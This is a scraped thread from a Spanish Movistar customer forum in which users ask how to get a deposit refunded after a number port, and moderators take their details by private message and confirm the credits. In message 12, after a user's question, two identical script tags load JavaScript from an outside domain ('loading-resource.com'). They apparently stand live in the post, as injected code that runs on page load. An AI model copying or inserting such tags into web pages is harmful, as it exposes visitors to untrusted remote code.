Fax para devolver dinero portabilidad

idea
Más integrado que la RDSI
Fax para devolver dinero portabilidad

Buenos días,

acabo de cancelar la portabilidad con Orange que me ha costado 30 euros y me quedo con Movistar porque me han hecho una buena oferta. Me comentaron que enviando el papel de la fianza a este fax 680 017 583 me lo ingresarían en mi cuenta pero es un fax que siempre comunica. ¿me pueden ayudar? ¿lo puedo enviar por mail?

Un saludo, y espero su respuesta.

 

 

Mensaje 1 de 17
1.326 Visitas
16 RESPUESTAS 16
Carmen.S-movistar
Antiguo Moderador

 

 

    Buenas tardes @idea y bienvenida a la comunidad Guiño!!

 

Son faxes móviles y cuando lo envías tienes que hacerlo desde uno que tenga esta opción, de todos modos, puedes contactar con el 224472 y que te lo confirmen.

 

Si no te dan otra opción, contacta de nuevo en el hilo y miro que se puede hacerGuiño!!

 

    Un saludo.

 



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 2 de 17
1.283 Visitas
idea
Más integrado que la RDSI

He seguido los pasos que me has indicado pero el fax sigue dando comunicando.

¿me puedes ayudar?

gracias

Mensaje 3 de 17
1.271 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola @ideaEmoticono feliz!!

 

Te he enviado un privado con mi correo para que me envíes el justificante de la fianza.

 

 

Necesito los siguientes datos que, si quieres, me puedes envíar respondiendo a mi privado

 
* Nombre/Apellidos
* DNI
* Número de teléfono

Una vez lo compruebe, ya te comento...Guiño

 

    Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 4 de 17
1.263 Visitas
idea
Más integrado que la RDSI

Hola Carmen,

al final me parece que ha pasado el fax, de todos modos me lo puedes comprobar.

Mi nombre es XXX XXXXX, mi número de teléfono es el 6XXXXXXXX y mi DNi es XXXXXXXXXX.

Si el fax ha pasado los 30 euros me los ingresarán en mi número de cuenta?

Muchas gracias

Mensaje 5 de 17
1.260 Visitas
AloxaMento
Yo probé el VDSL

Si vas a una tienda movistar te envian ellos el fax gratis

Mensaje 6 de 17
1.255 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Hola @ideaEmoticono feliz!!

 

Ese fax no nos llega a nosotros....hasta que sea recibido y haya constancia en la línea pueden parsar 48h laborables....

 

De todos modos, sino estás seguro de el reporte sea positivo, puedes seguir el consejo de @AloxaMento o enviar los datos pero por privado.

 

    Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 7 de 17
1.226 Visitas
Carmen.S-movistar
Antiguo Moderador

 

 

    Buenas noticias @ideaEmoticono feliz!!

 

Abono realizado con fecha 15 de Sept así que en la próxima factura de 1 de Oct. ya lo tienes aplicado.

 

El importe de la factura es de -24,62€  (recibirás el abono en cuenta, aproximadamente, a finales del mes de Octubre en vez del cargo que tienes habitualmente a principios de mes).

 

Cualquier duda me comentas.

 

Te he enviado un privado, por favor, échale un vistazo cuando tengas un momento.

 

    Saludos.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 8 de 17
1.162 Visitas
pedrogomezortega
Más integrado que la RDSI

Hola, a mi me pasaba algo parecido, primero mandé el fax con el recibo de 20€ de Orange y me dijeron en el 224472 que no me lo devolvian porque no se veia el cuño de la tienda de Orange, despues de mucho intentarlo lo mandé el pasado 25/10/12 al 680017583 y llamo al 224472 para confirmar que lo han recibido pero me dicen que no les consta. Dime que puedo hacer por favor???

 

Saludos y gracias,

 

Pedro

Mensaje 9 de 17
941 Visitas
YoliG-movistar
Antiguo Moderador

Hola @pedrogomezortega

 

Me puedes enviar a mi dirección de correo el justificante  y se lo envío al departamento encargado para que realice la gestión.

 

Te envío un mp con mi dirección para que me lo puedas adjuntar.

 

Un salu2 Emoticono feliz

 

 




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 10 de 17
933 Visitas
YoliG-movistar
Antiguo Moderador

Hola @pedrogomezortega

 

He recibido tu correo con el justificante de la fianza  y compruebo que consta todo registrado en nuestra base de datos, así que he procedido a realizar el abono, lo podrás ver reflejado en la próxima factura.

 

Un salu2 Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 11 de 17
918 Visitas
rapanui12
Yo probé el VDSL

Yo Hice La portabiLIdad con tph via web. fueron 50€

 

que tendria que mandar yo....aLgun emaiL

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Mensaje 12 de 17
916 Visitas
pedrogomezortega
Más integrado que la RDSI

Muchisimas gracias Yoli Emoticono feliz

Mensaje 13 de 17
909 Visitas
OscarL-Movistar
Antiguo Moderador

Hola rapanui12,

 

¿En la oferta que te realizaron te ofrecieron devolver la fianza en factura? si es así, puedes enviarme un mp con el número de teléfono y NIF.

 

Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 14 de 17
906 Visitas
rapanui12
Yo probé el VDSL
Mp enviado
Mensaje 15 de 17
900 Visitas
OscarL-Movistar
Antiguo Moderador

Hola rapanui12,

 

En la oferta no consta ninguna devolución de fianza por lo que esta se aplique Emoticono triste

 

Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 16 de 17
891 Visitas
rapanui12
Yo probé el VDSL
Pues despues de 30min. Hablando ya no me acordaba... Por lo menos veo q existe mi oferta del samsung note II
Mensaje 17 de 17
888 Visitas